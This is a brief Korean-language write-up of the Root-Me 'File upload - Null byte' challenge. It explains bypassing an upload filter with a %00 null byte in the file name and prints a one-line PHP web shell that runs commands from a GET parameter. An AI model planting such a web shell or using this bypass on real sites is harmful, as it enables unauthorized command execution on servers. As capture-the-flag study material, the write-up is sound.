rootme - File upload - Null byte

해당 문제는 %00 --> nullbyte로 파일업로드를 우회하는 취약점을 가진 문제입니다.

아래와 같이 웹쉘을 작성하고,

<?php

system($_GET[cmd]);

?>

 

파일명을 아래와 같이 nullbyte로 변환한 후 업로드합니다.

 

 

그후 해당 파일을 로딩하면

 

 

password 획득이 가능합니다 :)

 

아래 블로그에서 정보를 얻어서 풀이했습니다.

> h232ch.tistory.com/37